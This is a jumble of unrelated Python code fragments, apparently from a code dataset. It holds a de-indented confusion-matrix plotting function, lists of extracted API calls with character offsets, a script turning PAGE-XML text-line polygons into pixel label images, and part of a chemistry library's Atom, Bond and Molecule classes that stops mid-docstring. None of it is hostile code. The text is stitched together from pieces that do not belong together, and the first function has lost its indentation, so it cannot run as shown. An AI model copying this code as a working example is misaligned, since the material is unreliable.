count: If True, show the raw number in the confusion matrix. Default is True.
    percent:       If True, show the proportions for each category. Default is True.
cbar: If True, show the color bar. The cbar values are based off the values in the confusion matrix.
Default is True.
xyticks: If True, show x and y ticks. Default is True.
xyplotlabels: If True, show 'True Label' and 'Predicted Label' on the figure. Default is True.
sum_stats: If True, display summary statistics below the figure. Default is True.
figsize: Tuple representing the figure size. Default will be the matplotlib rcParams value.
cmap: Colormap of the values displayed from matplotlib.pyplot.cm. Default is 'Blues'
See http://matplotlib.org/examples/color/colormaps_reference.html
title: Title for the heatmap. Default is None.
'''
# CODE TO GENERATE TEXT INSIDE EACH SQUARE
blanks = ['' for i in range(cf.size)]
if group_names and len(group_names)==cf.size:
group_labels = ["{}\n".format(value) for value in group_names]
else:
group_labels = blanks
if count:
group_counts = ["{0:0.0f}\n".format(value) for value in cf.flatten()]
else:
group_counts = blanks
if percent:
group_percentages = ["{0:.2%}".format(value) for value in cf.flatten()/np.sum(cf)]
else:
group_percentages = blanks
box_labels = [f"{v1}{v2}{v3}".strip() for v1, v2, v3 in zip(group_labels,group_counts,group_percentages)]
box_labels = np.asarray(box_labels).reshape(cf.shape[0],cf.shape[1])
# CODE TO GENERATE SUMMARY STATISTICS & TEXT FOR SUMMARY STATS
if sum_stats:
#Accuracy is sum of diagonal divided by total observations
accuracy = np.trace(cf) / float(np.sum(cf))
#if it is a binary confusion matrix, show some more stats
if len(cf)==2:
#Metrics for Binary Confusion Matrices
precision = cf[1,1] / sum(cf[:,1])
recall = cf[1,1] / sum(cf[1,:])
f1_score = 2*precision*recall / (precision + recall)
stats_text = "\n\nAccuracy={:0.3f}\nPrecision={:0.3f}\nRecall={:0.3f}\nF1 Score={:0.3f}".format(
accuracy,precision,recall,f1_score)
else:
stats_text = "\n\nAccuracy={:0.3f}".format(accuracy)
else:
stats_text = ""
# SET FIGURE PARAMETERS ACCORDING TO OTHER ARGUMENTS
    if figsize is None:
#Get default figure size if not set
figsize = plt.rcParams.get('figure.figsize')
    if not xyticks:
#Do not show categories if xyticks is False
categories=False
# MAKE THE HEATMAP VISUALIZATION
plt.figure(figsize=figsize)
sns.heatmap(cf,annot=box_labels,fmt="",cmap=cmap,cbar=cbar,xticklabels=categories,yticklabels=categories)
if xyplotlabels:
plt.ylabel('True label')
plt.xlabel('Predicted label' + stats_text)
else:
plt.xlabel(stats_text)
if title:
plt.title(title)
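# Usage sketch with synthetic data (the counts and label names below are placeholders,
# not values from the original analysis):
if __name__ == '__main__':
    example_cf = np.array([[50, 10],
                           [5, 35]])
    make_confusion_matrix(example_cf,
                          group_names=['TN', 'FP', 'FN', 'TP'],
                          categories=['negative', 'positive'],
                          title='Example confusion matrix')
    plt.show()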
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.axvline",
"numpy.trace",
"seaborn.heatmap",
"numpy.sum",
"emoji.demojize",
"datetime.datetime.fromtimestamp",
"numpy.asarray",
"matplotlib.pyplot.rcParams.get",
"datetime.datetime",
"matplotlib.pyplot.figure",
"glob.glob",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xticks",
"matplotlib.pyplot.xlabel"
] |
[((305, 345), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', (['(timestamp / 1000)'], {}), '(timestamp / 1000)\n', (327, 345), False, 'from datetime import datetime\n'), ((762, 811), 'matplotlib.pyplot.axvline', 'plt.axvline', (['day_start'], {'linestyle': '"""--"""', 'color': '"""r"""'}), "(day_start, linestyle='--', color='r')\n", (773, 811), True, 'import matplotlib.pyplot as plt\n'), ((917, 964), 'matplotlib.pyplot.axvline', 'plt.axvline', (['day_end'], {'linestyle': '"""--"""', 'color': '"""r"""'}), "(day_end, linestyle='--', color='r')\n", (928, 964), True, 'import matplotlib.pyplot as plt\n'), ((1113, 1190), 'matplotlib.pyplot.axvline', 'plt.axvline', (['day_pulwama'], {'linestyle': '"""--"""', 'alpha': '(0.5)', 'color': '"""k"""', 'linewidth': '(1.5)'}), "(day_pulwama, linestyle='--', alpha=0.5, color='k', linewidth=1.5)\n", (1124, 1190), True, 'import matplotlib.pyplot as plt\n'), ((1193, 1270), 'matplotlib.pyplot.axvline', 'plt.axvline', (['day_balakot'], {'linestyle': '"""--"""', 'alpha': '(0.5)', 'color': '"""k"""', 'linewidth': '(1.5)'}), "(day_balakot, linestyle='--', alpha=0.5, color='k', linewidth=1.5)\n", (1204, 1270), True, 'import matplotlib.pyplot as plt\n'), ((2143, 2193), 'matplotlib.pyplot.xticks', 'plt.xticks', (['x_tick_keys', 'x_tick_label'], {'rotation': '(90)'}), '(x_tick_keys, x_tick_label, rotation=90)\n', (2153, 2193), True, 'import matplotlib.pyplot as plt\n'), ((2252, 2293), 'glob.glob', 'glob.glob', (['"""../Political_Results/Emoji/*"""'], {}), "('../Political_Results/Emoji/*')\n", (2261, 2293), False, 'import glob\n'), ((6804, 6831), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize'}), '(figsize=figsize)\n', (6814, 6831), True, 'import matplotlib.pyplot as plt\n'), ((6836, 6952), 'seaborn.heatmap', 'sns.heatmap', (['cf'], {'annot': 'box_labels', 'fmt': '""""""', 'cmap': 'cmap', 'cbar': 'cbar', 'xticklabels': 'categories', 'yticklabels': 'categories'}), "(cf, annot=box_labels, fmt='', cmap=cmap, cbar=cbar, xticklabels\n =categories, yticklabels=categories)\n", (6847, 6952), True, 'import seaborn as sns\n'), ((861, 913), 'matplotlib.pyplot.axvline', 'plt.axvline', (['i'], {'linestyle': '"""--"""', 'alpha': '(0.2)', 'color': '"""r"""'}), "(i, linestyle='--', alpha=0.2, color='r')\n", (872, 913), True, 'import matplotlib.pyplot as plt\n'), ((6625, 6659), 'matplotlib.pyplot.rcParams.get', 'plt.rcParams.get', (['"""figure.figsize"""'], {}), "('figure.figsize')\n", (6641, 6659), True, 'import matplotlib.pyplot as plt\n'), ((6972, 6996), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""True label"""'], {}), "('True label')\n", (6982, 6996), True, 'import matplotlib.pyplot as plt\n'), ((7005, 7047), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (["('Predicted label' + stats_text)"], {}), "('Predicted label' + stats_text)\n", (7015, 7047), True, 'import matplotlib.pyplot as plt\n'), ((7066, 7088), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['stats_text'], {}), '(stats_text)\n', (7076, 7088), True, 'import matplotlib.pyplot as plt\n'), ((7116, 7132), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (7125, 7132), True, 'import matplotlib.pyplot as plt\n'), ((5644, 5666), 'numpy.asarray', 'np.asarray', (['box_labels'], {}), '(box_labels)\n', (5654, 5666), True, 'import numpy as np\n'), ((5874, 5886), 'numpy.trace', 'np.trace', (['cf'], {}), '(cf)\n', (5882, 5886), True, 'import numpy as np\n'), ((5895, 5905), 'numpy.sum', 'np.sum', (['cf'], {}), '(cf)\n', (5901, 5905), True, 'import numpy as np\n'), ((201, 237), 
'datetime.datetime', 'datetime', (['year', 'month', 'date', '(0)', '(0)', '(0)'], {}), '(year, month, date, 0, 0, 0)\n', (209, 237), False, 'from datetime import datetime\n'), ((5459, 5469), 'numpy.sum', 'np.sum', (['cf'], {}), '(cf)\n', (5465, 5469), True, 'import numpy as np\n'), ((2331, 2350), 'emoji.demojize', 'emoji.demojize', (['ele'], {}), '(ele)\n', (2345, 2350), False, 'import emoji\n')]
|
import os
import cv2
import numpy as np
import lxml.etree as ET
page_folder='moc_dataset/train/moc_train_xml/'
image_folder='moc_dataset/train/moc_train_images/'
pixel_label_folder='moc_dataset/train/moc_train_pixel_label/'
os.mkdir(pixel_label_folder)
for page_file in sorted(os.listdir(page_folder)):
print(page_file)
    # read the page image as grayscale and invert it so that ink pixels become bright (255)
    img=cv2.imread(image_folder+page_file[:-4]+'.png',0)
    img=255-img
    # parse the PAGE-XML layout description of this page
    tree=ET.parse(page_folder+page_file)
    root=tree.getroot()
    page=root[1]
    width=int(page.attrib.get('imageWidth'))
    height=int(page.attrib.get('imageHeight'))
    # blank canvas holding one integer label per pixel; text-line labels start at 5
    pixel_label_img=np.zeros((height,width))
    pixel_label=5
    text_region=page[1]
    number_of_textlines=len(text_region)
    # iterate over the text-line elements of the region (the first and last children are skipped)
    for i in range(1,number_of_textlines-1):
        textline=text_region[i]
        # the polygon outlining this text line is given as "x1,y1 x2,y2 ..." pairs
        points=textline[0].attrib.get('points').split(" ")
        number_of_vertices=len(points)
        vertices_list=[]
        for j in range(number_of_vertices):
            x=int(points[j].split(",")[0])
            y=int(points[j].split(",")[1])
            vertices_list.append([x,y])
        vertices_array=np.array([vertices_list],dtype=np.int32)
        # rasterise the polygon into a binary mask and keep only the ink pixels inside it
        line_mask=np.zeros((height,width))
        line_mask=cv2.fillPoly(line_mask,vertices_array,1)
        line_text=img*line_mask
        # every ink pixel of this text line gets the current label value
        pixel_label_img[line_text==255]=pixel_label
        pixel_label=pixel_label+1
    # save the per-pixel label map for this page
    cv2.imwrite(pixel_label_folder+page_file[:-4]+'.png',pixel_label_img)
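# Optional sanity-check sketch: reload the label image written for the last processed
# page and list the distinct text-line labels it contains.
check = cv2.imread(pixel_label_folder + page_file[:-4] + '.png', cv2.IMREAD_UNCHANGED)
print('distinct pixel labels in last page:', np.unique(check))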
|
[
"os.mkdir",
"cv2.imwrite",
"numpy.zeros",
"cv2.fillPoly",
"cv2.imread",
"numpy.array",
"lxml.etree.parse",
"os.listdir"
] |
[((225, 253), 'os.mkdir', 'os.mkdir', (['pixel_label_folder'], {}), '(pixel_label_folder)\n', (233, 253), False, 'import os\n'), ((279, 302), 'os.listdir', 'os.listdir', (['page_folder'], {}), '(page_folder)\n', (289, 302), False, 'import os\n'), ((334, 387), 'cv2.imread', 'cv2.imread', (["(image_folder + page_file[:-4] + '.png')", '(0)'], {}), "(image_folder + page_file[:-4] + '.png', 0)\n", (344, 387), False, 'import cv2\n'), ((408, 441), 'lxml.etree.parse', 'ET.parse', (['(page_folder + page_file)'], {}), '(page_folder + page_file)\n', (416, 441), True, 'import lxml.etree as ET\n'), ((593, 618), 'numpy.zeros', 'np.zeros', (['(height, width)'], {}), '((height, width))\n', (601, 618), True, 'import numpy as np\n'), ((1361, 1435), 'cv2.imwrite', 'cv2.imwrite', (["(pixel_label_folder + page_file[:-4] + '.png')", 'pixel_label_img'], {}), "(pixel_label_folder + page_file[:-4] + '.png', pixel_label_img)\n", (1372, 1435), False, 'import cv2\n'), ((1096, 1137), 'numpy.array', 'np.array', (['[vertices_list]'], {'dtype': 'np.int32'}), '([vertices_list], dtype=np.int32)\n', (1104, 1137), True, 'import numpy as np\n'), ((1155, 1180), 'numpy.zeros', 'np.zeros', (['(height, width)'], {}), '((height, width))\n', (1163, 1180), True, 'import numpy as np\n'), ((1198, 1240), 'cv2.fillPoly', 'cv2.fillPoly', (['line_mask', 'vertices_array', '(1)'], {}), '(line_mask, vertices_array, 1)\n', (1210, 1240), False, 'import cv2\n')]
|
from __future__ import unicode_literals
import copy
import heapq
import math
import numpy
import os
import types
import uuid
from .common import log
from .errors import MoleculeError, PTError, FileError
from .settings import Settings
from ..tools.pdbtools import PDBHandler, PDBRecord
from ..tools.utils import Units, PT
__all__ = ['Atom', 'Bond', 'Molecule']
#===================================================================================================
#===================================================================================================
#===================================================================================================
class Atom(object):
"""A class representing a single atom in three dimensional space.
An instance of this class has the following attributes:
* ``atnum`` -- atomic number (zero for "dummy atoms")
* ``coords`` -- tuple of length 3 storing spatial coordinates
* ``bonds`` -- list of bonds (see |Bond|) this atom is a part of
* ``mol`` -- a |Molecule| this atom belongs to
* ``properties`` -- a |Settings| instance storing all other information about this atom (initially it is populated with *\*\*other* keyword arguments passed to the constructor)
All the above attributes can be accessed either directly or using one of the following properties:
* ``x``, ``y``, ``z`` -- allow to read or modify each coordinate separately
    * ``symbol`` -- allows to read or write the atomic symbol directly. The atomic symbol is not stored as an attribute; instead, the atomic number (``atnum``) indicates the type of atom. In fact, ``symbol`` is just a wrapper around ``atnum`` that uses |PeriodicTable| as a translator::
>>> a = Atom(atnum=8)
>>> print a.symbol
O
>>> a.symbol = 'Ca'
>>> print a.atnum
20
* ``mass`` -- atomic mass, obtained from |PeriodicTable|, read only
* ``radius`` -- atomic radius, obtained from |PeriodicTable|, read only
* ``connectors`` -- number of connectors, obtained from |PeriodicTable|, read only
.. note::
When creating a new atom, its type can be chosen either by setting an atomic number or a symbol (``atnum`` and ``symbol`` constructor arguments). Symbol takes precedence -- if it is supplied, ``atnum`` argument is ignored.
Values stored in ``coords`` tuple do not necessarily have to be numeric, you can also store any string there. This might come handy for programs that allow parametrization of coordinates in the input file (to enforce some geometry constraints for example)::
>>> a = Atom(symbol='C', coords=(1,2,3))
>>> print a
C 1.00000 2.00000 3.00000
>>> a.y = 'param1'
>>> print a
C 1.00000 param1 3.00000
However, non-numerical coordinates cannot be used together with some methods (for example :meth:`distance_to` or :meth:`translate`). Trying to do this will raise an exception.
    Internally, atomic coordinates are always expressed in angstroms. Most of the methods that read or modify atomic coordinates accept a keyword argument ``unit`` allowing you to choose the unit in which results and/or arguments are expressed (see |Units| for details). Throughout the entire code angstrom is the default length unit. If you don't specify the ``unit`` parameter anywhere in your script, all the automatic unit handling described above boils down to an occasional multiplication/division by 1.0.
"""
def __init__(self, atnum=0, symbol=None, coords=None, unit='angstrom', bonds=None, mol=None, **other):
if symbol is not None:
self.symbol = symbol
else:
self.atnum = atnum
self.mol = mol
self.bonds = bonds or []
self.properties = Settings(other)
if coords is None:
self.coords = (0.0, 0.0, 0.0)
elif len(coords) == 3:
tmp = []
for i in coords:
try:
i = Units.convert(float(i), unit, 'angstrom')
except ValueError: pass
tmp.append(i)
self.coords = tuple(tmp)
else:
raise TypeError('Atom: Invalid coordinates passed')
def str(self, symbol=True, suffix='', unit='angstrom', space=14, decimal=6):
"""Return a string representation of this atom.
Returned string is a single line (no newline characters) that always contains atomic coordinates (and maybe more). Each atomic coordinate is printed using *space* characters, with *decimal* characters reserved for decimal digits. Coordinates values are expressed in *unit*.
If *symbol* is ``True``, atomic symbol is added at the beginning of the line. If *symbol* is a string, this exact string is printed there.
*suffix* is an arbitrary string that is appended at the end of returned line. It can contain identifiers in curly brackets (like for example ``f={fragment}``) that will be replaced by values of corresponding attributes (in this case ``self.fragment``). It is done via new string formatting and entire ``self.__dict__`` is passed to formating method. See :ref:`new-string-formatting` for details.
Example:
>>> a = Atom(atnum=6, coords=(1,1.5,2))
>>> print a.str()
C 1.000000 1.500000 2.000000
>>> print a.str(unit='bohr')
C 1.889726 2.834589 3.779452
>>> print a.str(symbol=False)
1.000000 1.500000 2.000000
>>> print a.str(symbol='C2.13')
C2.13 1.000000 1.500000 2.000000
>>> print a.str(suffix='protein1')
C 1.000000 1.500000 2.000000 protein1
>>> a.info = 'membrane'
>>> print a.str(suffix='subsystem={info}')
C 1.000000 1.500000 2.000000 subsystem=membrane
"""
strformat = '{:>%is}'%space
numformat = '{:>%i.%if}'%(space,decimal)
f = lambda x: numformat.format(Units.convert(x, 'angstrom', unit)) if isinstance(x, (int,float)) else strformat.format(str(x))
if symbol is False:
return ('{0}{1}{2} '+suffix).format(*map(f,self.coords), **self.__dict__)
if symbol is True:
symbol = self.symbol
return ('{0:>10s}{1}{2}{3} '+suffix).format(symbol, *map(f,self.coords), **self.__dict__)
def __str__(self):
"""Return a string representation of this atom. Simplified version of :meth:`str` to work as a magic method."""
return self.str()
def __iter__(self):
"""Iteration through atom yields coordinates. Thanks to that instances of |Atom| can be passed to any method requiring point or vector as an argument."""
return iter(self.coords)
def _setx(self, value): self.coords = (value, self.coords[1], self.coords[2])
def _sety(self, value): self.coords = (self.coords[0], value, self.coords[2])
def _setz(self, value): self.coords = (self.coords[0], self.coords[1], value)
def _getx(self): return self.coords[0]
def _gety(self): return self.coords[1]
def _getz(self): return self.coords[2]
x = property(_getx, _setx)
y = property(_gety, _sety)
z = property(_getz, _setz)
def _getsymbol(self):
return PT.get_symbol(self.atnum)
def _setsymbol(self, symbol):
self.atnum = PT.get_atomic_number(symbol)
symbol = property(_getsymbol, _setsymbol)
def _getmass(self):
return PT.get_mass(self.atnum)
mass = property(_getmass)
def _getradius(self):
return PT.get_radius(self.atnum)
radius = property(_getradius)
def _getconnectors(self):
return PT.get_connectors(self.atnum)
connectors = property(_getconnectors)
def translate(self, vector, unit='angstrom'):
"""Move this atom in space by *vector*, expressed in *unit*.
*vector* should be an iterable container of length 3 (usually tuple, list or numpy array). *unit* describes unit of values stored in *vector*.
This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise.
"""
ratio = Units.conversion_ratio(unit, 'angstrom')
self.coords = tuple(i + j*ratio for i,j in zip(self, vector))
def move_to(self, point, unit='angstrom'):
"""Move this atom to a given *point* in space, expressed in *unit*.
*point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*.
This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise.
"""
ratio = Units.conversion_ratio(unit, 'angstrom')
self.coords = tuple(i*ratio for i in point)
def distance_to(self, point, unit='angstrom', result_unit='angstrom'):
"""Measure the distance between this atom and *point*.
*point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*. Returned value is expressed in *result_unit*.
This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise.
"""
ratio = Units.conversion_ratio(unit, 'angstrom')
res = 0.0
for i,j in zip(self,point):
res += (i - j*ratio)**2
return Units.convert(math.sqrt(res), 'angstrom', result_unit)
def vector_to(self, point, unit='angstrom', result_unit='angstrom'):
"""Calculate a vector from this atom to *point*.
*point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*. Returned value is expressed in *result_unit*.
This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise.
"""
ratio = Units.conversion_ratio(unit, 'angstrom')
resultratio = Units.conversion_ratio('angstrom', result_unit)
return tuple((i*ratio-j)*resultratio for i,j in zip(point, self))
def angle(self, point1, point2, point1unit='angstrom', point2unit='angstrom',result_unit='radian'):
"""Calculate an angle between vectors pointing from this atom to *point1* and *point2*.
*point1* and *point2* should be iterable containers of length 3 (for example: tuple, |Atom|, list, numpy array). Values stored in them are expressed in, respectively, *point1unit* and *point2unit*. Returned value is expressed in *result_unit*.
This method requires all coordinates to be numerical values, :exc:`~exceptions.TypeError` is raised otherwise.
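        Example (``n``, ``h1`` and ``h2`` are atoms of the same molecule; the returned value is the angle at ``n``, in radians)::
            >>> n.angle(h1, h2)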
"""
num = numpy.dot(self.vector_to(point1, point1unit), self.vector_to(point2, point2unit))
den = self.distance_to(point1, point1unit) * self.distance_to(point2, point2unit)
return Units.convert(math.acos(num/den), 'radian', result_unit)
def rotate(self, matrix):
"""Rotate this atom according to rotation *matrix*.
*matrix* should be a container with 9 numerical values. It can be a list (tuple, numpy array etc.) listing matrix elements row-wise, either flat (``[1,2,3,4,5,6,7,8,9]``) or in two-level fashion (``[[1,2,3],[4,5,6],[7,8,9]]``).
.. note::
This method does not check if supplied matrix is a proper rotation matrix.
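        Example (a 90 degree counterclockwise rotation around the z axis)::
            >>> a = Atom(symbol='H', coords=(1.0, 0.0, 0.0))
            >>> a.rotate([[0,-1,0],[1,0,0],[0,0,1]])
            >>> print a
            H      0.000000      1.000000      0.000000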
"""
matrix = numpy.array(matrix).reshape(3,3)
self.coords = tuple(numpy.dot(matrix, numpy.array(self.coords)))
#===================================================================================================
#===================================================================================================
#===================================================================================================
class Bond (object):
"""A class representing a bond between two atoms.
An instance of this class has the following attributes:
* ``atom1`` and ``atom2`` -- two instances of |Atom| that form this bond
* ``order`` -- order of the bond. It is either an integer number or the floating point value stored in ``Bond.AR``, indicating aromatic bond
* ``mol`` -- a |Molecule| this bond belongs to
* ``properties`` -- a |Settings| instance storing all other information about this bond (initially it is populated with *\*\*other* keyword arguments passed to the constructor)
.. note::
Newly created bond is **not** added to ``atom1.bonds`` or ``atom2.bonds``. Storing information about |Bond| in |Atom| is relevant only in the context of the whole |Molecule|, so this information is updated by :meth:`~Molecule.add_bond`.
"""
AR = 1.5
def __init__(self, atom1, atom2, order=1, mol=None, **other):
self.atom1 = atom1
self.atom2 = atom2
self.order = order
self.mol = mol
self.properties = Settings(other)
def __str__(self):
"""Return string representation of this bond."""
return '(%s)--%1.1f--(%s)'%(str(self.atom1), self.order, str(self.atom2))
def __iter__(self):
"""Iterate over bonded atoms (``atom1`` first, then ``atom2``)."""
yield self.atom1
yield self.atom2
def is_aromatic(self):
"""Check if this bond is aromatic."""
return self.order == Bond.AR
def length(self, unit='angstrom'):
"""Return bond's length, expressed in *unit*."""
return self.atom1.distance_to(self.atom2, result_unit=unit)
def other_end(self, atom):
"""Return the atom on the other end of this bond with respect to *atom*.
*atom* has to be either ``atom1`` or ``atom2``, otherwise an exception is raised.
"""
if atom is self.atom1:
return self.atom2
elif atom is self.atom2:
return self.atom1
else:
raise MoleculeError('Bond.other_end: invalid atom passed')
def resize(self, atom, length, unit='angstrom'):
"""Change the length of the bond to *length*.
This method works in the following way: one of two atoms forming this bond is moved along the bond in such a way that new length is *length*, in *unit* (direction of the bond in space does not change). Atom indicated by *atom* has to be one of bond's atoms and it is the atom that is **not** moved.
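        Example (``b`` is a bond of some molecule; it is stretched to 1.5 angstrom while ``b.atom1`` stays in place)::
            >>> b.resize(b.atom1, 1.5)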
"""
ratio = 1.0 - Units.convert(length, unit, 'angstrom')/self.length()
moving = self.other_end(atom)
moving.translate(tuple(i*ratio for i in moving.vector_to(atom)))
#===================================================================================================
#===================================================================================================
#===================================================================================================
class Molecule (object):
"""A class representing basic molecule object.
An instance of this class has the following attributes:
* ``atoms`` -- a list of |Atom| objects that belong to this molecule
* ``bonds`` -- a list of |Bond| objects between atoms listed in ``atoms``
* ``lattice`` -- a list of lattice vectors, in case of periodic structures
* ``properties`` -- a |Settings| instance storing all other information about this molecule
.. note::
Each |Atom| in ``atoms`` list and each |Bond| in ``bonds`` list has a reference to the parent molecule. Moreover, each atom stores the list of bonds it's a part of and each bond stores references to atoms it bonds. That creates a complex net of references between objects that are part of a molecule. Consistency of this data is crucial for proper functioning of many methods. Because of that it is advised not to modify contents of ``atoms`` and ``bonds`` by hand. When you need to alter your molecule, methods :meth:`add_atom`, :meth:`delete_atom`, :meth:`add_bond` and :meth:`delete_bond` can be used to ensure that all these references are updated properly.
Creating a |Molecule| object for your calculation can be done in two ways. You can start with an empty molecule and manually add all atoms (and bonds, if needed)::
>>> mol = Molecule()
>>> mol.add_atom(Atom(atnum=1, coords=(0,0,0)))
>>> mol.add_atom(Atom(atnum=1, coords=(d,0,0)))
This approach can be useful for building small molecules, especially if you wish to parametrize some of atomic coordinates (like in :ref:`simple_example`), but in general it's not very practical. Usually one wants to import atomic coordinates from some external file::
>>> mol = Molecule('xyz/Benzene.xyz')
Constructor of a |Molecule| object accepts three arguments that can be used to supply this information from a file in your filesystem. *filename* should be a string with a path (absolute or relative) to such a file. *inputformat* describes the format of the file. Currently, the following formats are supported: ``xyz``, ``mol``, ``mol2`` and ``pdb``. If *inputformat* argument is not supplied, PLAMS will try to deduce it by examining the extension of the provided file, so in most of cases it is not needed to use *inputformat*, if only the file has the proper extension. Some formats (``xyz`` and ``pdb``) allow to store more than one geometry of a particular molecule within a single file. In such cases *geometry* argument can be used to indicate which (in order of appearance in the file) geometry to import. *other* keyword arguments passed to the constructor are used to populate ``properties`` |Settings|.
If a |Molecule| is initialized from an external file, the path to this file (*filename* argument) is stored in ``properties.source``. The base name of the file without extension is kept in ``properties.name``.
It is also possible to write a molecule to a file in one of the formats mentioned above. See :meth:`write` for details.
``lattice`` attribute is used to store information about lattice vectors in case of periodic structures. Some job types (|BANDJob|, |DFTBJob|) will automatically use that data while constructing input files. ``lattice`` should be a list of up to 3 vectors (for different types of periodicity: chain, slab or bulk), each of which needs to be a list or a tuple of 3 numbers.
Lattice vectors can be directly read and written to ``xyz`` files using the following convention (please mind the fact that this is an unofficial extension to the XYZ format)::
3
H 0.000000 0.765440 -0.008360
O 0.000000 0.000000 0.593720
H 0.000000 -0.765440 -0.008360
VEC1 3.000000 0.000000 0.000000
VEC2 0.000000 3.000000 0.000000
VEC3 0.000000 0.000000 3.000000
For 1D (2D) periodicity please supply only ``VEC1`` (``VEC1`` and ``VEC2``). Writing lattice vectors to ``xyz`` files can be disabled by simply reseting the ``lattice`` attribute::
>>> mol.lattice = []
|hspace|
    Below, a detailed description of the available methods is presented. Many of these methods require passing atoms belonging to the molecule as arguments. It can be done by using a reference to an |Atom| object present in the ``atoms`` list, but not by passing the number of an atom (its position within the ``atoms`` list). Unlike some other tools, PLAMS does not use integer numbers as primary identifiers of atoms. This is done to prevent problems when atoms within a molecule are reordered or some atoms are deleted. References to |Atom| or |Bond| objects can be obtained directly from the ``atoms`` or ``bonds`` lists, or with dictionary-like bracket notation::
>>> mol = Molecule('xyz/Ammonia.xyz')
>>> mol.guess_bonds()
>>> print mol
Atoms:
1 H 0.942179 0.000000 -0.017370
2 H -0.471089 0.815951 -0.017370
3 N 0.000000 0.000000 0.383210
4 H -0.471089 -0.815951 -0.017370
Bonds:
(1)--1.0--(3)
(2)--1.0--(3)
(3)--1.0--(4)
>>> at = mol[1]
>>> print at
H 0.942179 0.000000 -0.017370
>>> b = mol[(1,3)]
>>> print b
( H 0.942179 0.000000 -0.017370 )--1.0--( N 0.000000 0.000000 0.383210 )
>>> b = mol[(1,4)]
>>> print b
None
.. note::
Numbering of atoms within a molecule starts with 1.
However, if you feel more familiar with identifying atoms by natural numbers, you can use :meth:`set_atoms_id` to equip each atom of the molecule with ``id`` attribute equal to atom's position within ``atoms`` list. This method can also be helpful to track changes in your molecule during tasks that can reorder atoms.
"""
def __init__(self, filename=None, inputformat=None, geometry=1, **other):
self.atoms = []
self.bonds = []
self.lattice = []
self.properties = Settings(other)
if filename is not None :
self.read(filename, inputformat, geometry)
self.properties.source = filename
self.properties.name = os.path.splitext(os.path.basename(filename))[0]
#===================================================================================================
#==== Atoms/bonds manipulation =====================================================================
#===================================================================================================
def copy(self, atoms=None):
"""Return a copy of this molecule. New molecule has atoms, bonds and all other components distinct from original molecule (it is so called "deep copy").
By default the entire molecule is copied. It is also possible to copy only some part of the molecule, indicated by *atoms* argument. It should be a list of atoms that **belong to this molecule**. Only these atoms, together with any bonds between them, are copied and included in the returned molecule.
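        Example (copy only the first three atoms of the molecule, together with any bonds between them)::
            >>> fragment = mol.copy(atoms=mol.atoms[:3])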
"""
if atoms is None:
return copy.deepcopy(self)
for at in self.atoms:
at._stay = False
for at in atoms:
at._stay = True
ret = copy.deepcopy(self)
for at in reversed(ret.atoms):
if at._stay is False:
ret.delete_atom(at)
del at._stay
for at in self.atoms:
del at._stay
return ret
def add_atom(self, atom, adjacent=None):
"""Add new *atom* to this molecule.
*atom* should be an |Atom| instance that does not belong to the molecule. Bonds between the new atom and other atoms of the molecule can be automatically added based on *adjacent* argument. It should be a list describing atoms of the molecule that the new atom is connected to. Each element of *adjacent* list can either be a pair ``(Atom, order)`` to indicate new bond's order (use ``Bond.AR`` for aromatic bonds) or an |Atom| instance (a single bond is inserted in this case).
Example::
>>> mol = Molecule() #create an empty molecule
>>> h1 = Atom(symbol='H', coords=(1.0, 0.0, 0.0))
>>> h2 = Atom(symbol='H', coords=(-1.0, 0.0, 0.0))
>>> o = Atom(symbol='O', coords=(0.0, 1.0, 0.0))
>>> mol.add_atom(h1)
>>> mol.add_atom(h2)
>>> mol.add_atom(o)
>>> mol.add_atom(Atom(symbol='C', coords=(0.0, 0.0, 0.0)), adjacent=[h1, h2, (o,2)])
"""
self.atoms.append(atom)
atom.mol = self
if adjacent is not None:
for adj in adjacent:
if isinstance(adj, tuple):
self.add_bond(atom, adj[0], adj[1])
else:
self.add_bond(atom, adj)
def delete_atom(self, atom):
"""Delete *atom* from this molecule.
*atom* should be an |Atom| instance that belongs to the molecule. All bonds containing this atom are removed too.
Examples::
>>> #delete all hydrogens
>>> mol = Molecule('protein.pdb')
>>> hydrogens = [atom for atom in mol if atom.atnum == 1]
>>> for i in hydrogens: mol.delete_atom(i)
::
>>> #delete first two atoms
>>> mol = Molecule('geom.xyz')
>>> mol.delete_atom(mol[1])
>>> mol.delete_atom(mol[1]) #since the second atom of original molecule is now the first
"""
if atom.mol != self:
raise MoleculeError('delete_atom: passed atom should belong to the molecule')
try:
self.atoms.remove(atom)
except:
raise MoleculeError('delete_atom: invalid argument passed as atom')
for b in reversed(atom.bonds):
self.delete_bond(b)
def add_bond(self, arg1, arg2=None, order=1):
"""Add new bond to this molecule.
This method can be used in two different ways. You can call it with just one argument being a |Bond| instance (other arguments are then ignored)::
>>> b = Bond(mol[2], mol[4], order=Bond.AR) #create aromatic bond between 2nd and 4th atom
>>> mol.add_bond(b)
Other way is to pass two atoms (and possibly bond order) and new |Bond| object will be created automatically::
>>> mol.add_bond(mol[2], mol[4], order=Bond.AR)
        In both cases the atoms that are to be bonded have to belong to the molecule, otherwise an exception is raised.
"""
if isinstance(arg1, Atom) and isinstance(arg2, Atom):
newbond = Bond(arg1, arg2, order=order)
elif isinstance(arg1, Bond):
newbond = arg1
else:
raise MoleculeError('add_bond: invalid arguments passed')
if newbond.atom1.mol == self and newbond.atom2.mol == self:
newbond.mol = self
self.bonds.append(newbond)
newbond.atom1.bonds.append(newbond)
newbond.atom2.bonds.append(newbond)
else:
raise MoleculeError('add_bond: bonded atoms have to belong to the molecule')
def delete_bond(self, arg1, arg2=None):
"""Delete bond from this molecule
